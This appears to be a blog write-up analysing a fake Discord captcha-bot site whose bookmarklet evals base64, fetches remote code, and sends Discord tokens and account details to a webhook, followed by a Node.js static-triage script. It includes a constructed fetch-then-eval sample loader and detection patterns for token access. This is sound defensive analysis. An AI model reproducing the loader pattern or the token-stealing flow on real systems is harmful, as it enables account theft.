Someone sent me a tweet to ask whether what it said was true and not just another clickbait tweet. After looking at the tweet and doing some OSINT, we found that there is a malicious actor using a fake bot impersonating a real Discord bot.
The first screenshot is of the fake Discord bot page attempting to steal the Discord token; the second screenshot is the real Discord page for the Discord bot. The fake site is located at https://captcha-bot.io.
After reading what the fake site asks you to do, it’s pretty obvious that it runs JS code through a bookmark. Let’s see what the bookmark really does by inspecting the “Drag Me” element.
It seems to eval some decoded base64 string, so let’s decode the base64 string to see what it does.
Well, it fetches a Discord attachment and runs eval on the code it gets from the URI. Of course it is obfuscated and needs to be deobfuscated. It appears to grab the Username, Discord ID, Email, and Token and forward them to a Discord webhook. Since this post, the webhook has been deleted and neutralized.
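The decoding steps above can be done without ever running the bookmark. The following is an added example, not code from the fake site or from this post's author: a Node.js triage function that peels the eval/base64 layers of a bookmarklet href as plain text and lists what each layer references. The sample href, its URL and the check names are constructed placeholders.

```javascript
// Added example: static triage of a bookmarklet href. Nothing is executed or fetched.
// SAMPLE_INNER / SAMPLE_HREF are constructed stand-ins, not the code from the fake site.
const SAMPLE_INNER =
  'fetch("https://example.invalid/attachments/placeholder.js").then(r=>r.text()).then(eval)';
const SAMPLE_HREF =
  'javascript:eval(atob("' + Buffer.from(SAMPLE_INNER).toString('base64') + '"))';

// Hypothetical check names; each flags a behaviour described in the write-up.
const CHECKS = [
  ['eval', /\beval\b/],
  ['base64-decode', /\batob\s*\(/],
  ['remote-fetch', /\bfetch\s*\(|XMLHttpRequest/],
  ['token-access', /localStorage|\btoken\b/i],
];

function triageBookmarklet(href, maxDepth = 5) {
  const report = { isBookmarklet: false, layers: [], urls: [], findings: [] };
  const m = /^\s*javascript:(.*)$/is.exec(href);
  if (!m) return report; // ordinary link, nothing to decode
  report.isBookmarklet = true;

  let code = m[1];
  try { code = decodeURIComponent(code); } catch { /* keep raw text if not valid percent-encoding */ }

  for (let depth = 0; code !== null && depth < maxDepth; depth++) {
    report.layers.push(code);
    for (const [name, re] of CHECKS) {
      if (re.test(code) && !report.findings.includes(name)) report.findings.push(name);
    }
    for (const u of code.match(/https?:\/\/[^\s"'`)]+/g) || []) {
      if (!report.urls.includes(u)) report.urls.push(u);
    }
    // Peel one layer: decode the string literal passed to atob(), as data only.
    const b64 = /atob\s*\(\s*["'`]([A-Za-z0-9+\/=]+)["'`]\s*\)/.exec(code);
    code = b64 ? Buffer.from(b64[1], 'base64').toString('utf8') : null;
  }
  return report;
}

console.log(JSON.stringify(triageBookmarklet(SAMPLE_HREF), null, 2));
```

A bookmark that combines the eval, base64-decode and remote-fetch findings matches the loader pattern described in this post; the second-stage script it points to still has to be retrieved and deobfuscated separately.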